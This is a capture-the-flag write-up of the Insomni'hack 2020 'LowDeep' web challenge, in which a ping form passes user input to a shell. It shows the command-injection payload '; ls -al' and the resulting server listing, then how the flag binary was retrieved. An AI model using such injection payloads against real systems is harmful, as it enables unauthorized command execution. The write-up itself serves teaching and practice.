Tags: web rce ping 


# Insomni'hack teaser 2020 – LowDeep

* **Category:** web
* **Points:** 36

## Challenge

> by patacrep & pwndawan
> Try out our new ping platform: http://lowdeep.insomnihack.ch/

## Solution

The website contains a page where you can insert an IP address to ping.


<html lang="en">
<title>Insomni'hack 2020 Teaser</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js"></script>
body {
background-image: url("_res_/img/skull-slim.png");
background-color: #cccccc;

<div class="container p-3 my-3 bg-dark text-white">
<h2>LowDeep Plateform </h2>

That's our new plateform to perform ping the easy way.

<form action="#" method="post">
<div class="form-group">
<label for="ip">Enter the IP address to ping:</label>
<input type="text" class="form-control" id="ip" name="ipaddr">
<input type="submit" name="submit" value="Submit" class="btn btn-primary" />

The `ping` command is launched via shell, so a command in the input field can be injected to execute arbitrary operations.

For example `; ls -al` payload will give the following output.

PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=64 time=0.019 ms

--- ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.019/0.019/0.019/0.000 ms
total 28
drwxr-xr-x 3 root root 4096 Jan 17 09:57 .
drwxr-xr-x 3 root root 4096 Jan 7 16:52 ..
drwxr-xr-x 4 root root 4096 Jan 17 09:57 _res_
-rw-r--r-- 1 root root 1367 Jan 16 15:30 index.php
-rw-r--r-- 1 root root 6128 Jan 16 13:10 print-flag
-rw-r--r-- 1 root root 42 Jan 16 15:35 robots.txt

Accessing to `http://lowdeep.insomnihack.ch/print-flag` will download the [`print-flag` file](https://github.com/m3ssap0/CTF-Writeups/raw/master/Insomni'hack%20teaser%202020/LowDeep/print-flag).

Using `strings` will print the flag.

root@m3ss4p0:~# strings print-flag
GCC: (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0

So the flag is the following.


Original writeup (https://github.com/m3ssap0/CTF-Writeups/blob/master/Insomni'hack%20teaser%202020/LowDeep/README.md).